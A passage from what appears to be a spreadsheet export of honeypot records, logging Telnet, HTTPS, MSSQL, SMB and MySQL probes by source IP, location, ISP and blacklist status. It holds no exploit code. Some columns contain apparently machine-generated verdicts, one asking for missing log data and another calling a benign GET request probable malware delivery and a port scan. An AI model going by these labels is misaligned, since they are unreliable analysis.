    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:6688"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="989"/>
    <x v="989"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T20:28:31"/>
    <d v="2025-03-10T23:32:33"/>
    <d v="2025-04-23T20:28:31"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="443&amp;&amp;8443&amp;&amp;44668"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="52"/>
    <s v="Královéhradecký kraj"/>
    <s v="Hradec Králové District"/>
    <s v="Hradec Králové (Slezské Předměstí)"/>
    <s v="3074967"/>
    <s v="500 03"/>
    <s v="50.2121"/>
    <s v="15.8491"/>
    <s v="204666"/>
    <s v="Jiri Tlapak"/>
    <s v="STEN.cz s.r.o."/>
    <s v="business"/>
    <s v="STEN.cz s.r.o."/>
    <s v="2015-04-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b961:19a7"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. _x000a__x000a_Activity description unavailable due to lack of information. &amp;&amp; No log data provided, unable to analyze."/>
    <s v="There is no log data provided. Please provide the actual log data for me to analyze. &amp;&amp; I'd be happy to help analyze the log data! However, it seems like there's no data provided. Please share the actual log data, and I'll do my best to identify the type of attack in a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="990"/>
    <x v="990"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T20:22:08"/>
    <d v="2025-04-23T20:22:08"/>
    <d v="2025-04-23T20:22:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:f77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="991"/>
    <x v="991"/>
    <s v="NA&amp;&amp;mcn-c6d86144.miyazaki-catv.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-23T20:17:34"/>
    <d v="2025-02-22T13:12:48"/>
    <d v="2025-04-23T20:17:34"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="443&amp;&amp;8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="45"/>
    <s v="Miyazaki"/>
    <s v="Miyazaki"/>
    <s v="Miyazaki"/>
    <s v="1856717"/>
    <s v="NA"/>
    <s v="31.9167"/>
    <s v="131.417"/>
    <s v="17939"/>
    <s v="miyazaki cabletelevision network Co.,LTD"/>
    <s v="miyazaki cabletelevision network Co., LTD"/>
    <s v="residential"/>
    <s v="MCN"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '38.60.209.6', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bb0:ba90"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="A malicious actor is attempting to access the root directory of a service using a GET request, potentially for reconnaissance or data retrieval purposes. The request also specifies supported content types, which could be used to deliver malware or exploit vulnerabilities. The Host header indicates the attacker's IP address is likely probing the service. &amp;&amp; The user is attempting to access the root directory of a web server with an encrypted connection, possibly looking for sensitive information or exploiting vulnerabilities. The request includes accepting plain and HTML text formats, which could be used to deliver malicious content. This behavior may indicate reconnaissance or a potential attack on the system."/>
    <s v="Port Scanning &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="992"/>
    <x v="992"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T20:11:36"/>
    <d v="2025-02-10T01:41:07"/>
    <d v="2025-04-23T20:11:36"/>
    <n v="77"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="133661"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="Lynx Inc"/>
    <s v="business"/>
    <s v="Lynx Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,13687)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,14032)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,14033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,17699)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,17718)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,62458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,58767)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,58818)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,53241)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27839)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27889)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27906)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,42566)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,42917)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,30721)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:676e:f960"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="993"/>
    <x v="993"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:55:39"/>
    <d v="2024-12-10T18:35:23"/>
    <d v="2025-04-23T19:55:39"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="20"/>
    <s v="Semnan"/>
    <s v="Shahrestān-e Shāhrūd"/>
    <s v="Shahrud"/>
    <s v="135423"/>
    <s v="NA"/>
    <s v="36.4183"/>
    <s v="54.9692"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Telecommunication Company of Semnan"/>
    <s v="2012-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5ef:f010"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="994"/>
    <x v="994"/>
    <s v="220-132-90-171.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:39:07"/>
    <d v="2024-04-14T11:08:07"/>
    <d v="2025-04-23T19:39:07"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="2358&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:5aab"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="995"/>
    <x v="995"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:36:15"/>
    <d v="2025-04-23T19:36:15"/>
    <d v="2025-04-23T19:36:15"/>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dd:c85e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="996"/>
    <x v="996"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:23:35"/>
    <d v="2023-11-28T05:38:39"/>
    <d v="2025-04-23T19:23:35"/>
    <n v="264"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;15656&amp;&amp;445&amp;&amp;60592"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Secunderabad"/>
    <s v="1256922"/>
    <s v="500003"/>
    <s v="17.4399"/>
    <s v="78.4983"/>
    <s v="55577"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,52416)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55497)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55789)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,61032)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,61739)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,64462)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,65020)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,53262)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63050)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,51159)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,51675)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60294)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60592)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,54801)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,50406)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,50872)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57939)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,58561)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57138)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57200)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63030)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63687)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,59740)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60000)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c7b:6027"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="SMB Scan"/>
  </r>
  <r>
    <x v="997"/>
    <x v="997"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:14:25"/>
    <d v="2025-04-23T14:07:17"/>
    <d v="2025-04-23T19:14:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c4:7755"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="998"/>
    <x v="998"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T19:04:15"/>
    <d v="2025-04-23T19:04:15"/>
    <d v="2025-04-23T19:04:15"/>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3b5e:8787"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="999"/>
    <x v="999"/>
    <s v="NA&amp;&amp;static-23-234-68-68.cust.tzulo.com"/>
    <x v="0"/>
    <d v="2025-04-23T18:57:52"/>
    <d v="2025-04-23T18:07:42"/>
    <d v="2025-04-23T18:57:52"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CO"/>
    <s v="Colorado"/>
    <s v="Denver"/>
    <s v="Denver"/>
    <s v="5419384"/>
    <s v="80208"/>
    <s v="39.7392"/>
    <s v="-104.99"/>
    <s v="11878"/>
    <s v="tzulo, inc."/>
    <s v="tzulo, inc."/>
    <s v="hosting"/>
    <s v="Jayson Batbatan"/>
    <s v="2013-09-26"/>
    <s v="TZULO"/>
    <s v="2013-09-26"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-04-19 04:30:40"/>
    <s v="2026-04-19 04:30:40"/>
    <s v="2025-03-21 06:21:29"/>
    <s v="['NS1.TZULO.COM', 'NS2.TZULO.COM']"/>
    <s v="ENOM, INC."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Whois Agent (081135083)"/>
    <x v="10"/>
    <s v="NA"/>
    <s v="['PO Box 639', 'C/O tzulo.com']"/>
    <s v="::ffff:17ea:4444"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1000"/>
    <x v="1000"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:49:12"/>
    <d v="2025-04-23T18:49:12"/>
    <d v="2025-04-23T18:49:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:e9d8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1001"/>
    <x v="1001"/>
    <s v="24-226-184-97.resi.cgocable.ca&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:45:21"/>
    <d v="2025-04-07T00:38:48"/>
    <d v="2025-04-23T18:45:21"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="QC"/>
    <s v="Quebec"/>
    <s v="Montréal"/>
    <s v="Montreal"/>
    <s v="6077243"/>
    <s v="H4X"/>
    <s v="45.5019"/>
    <s v="-73.5674"/>
    <s v="11290"/>
    <s v="Cogeco Connexion inc"/>
    <s v="Cogeco Connexion inc"/>
    <s v="residential"/>
    <s v="Cogeco Communications Holdings, Inc."/>
    <s v="1997-08-20"/>
    <s v="CC-3272"/>
    <s v="2019-09-30"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="1"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="::ffff:18e2:b861"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1002"/>
    <x v="1002"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:41:52"/>
    <d v="2024-12-15T06:57:45"/>
    <d v="2025-04-23T18:41:52"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="1994-04-20"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
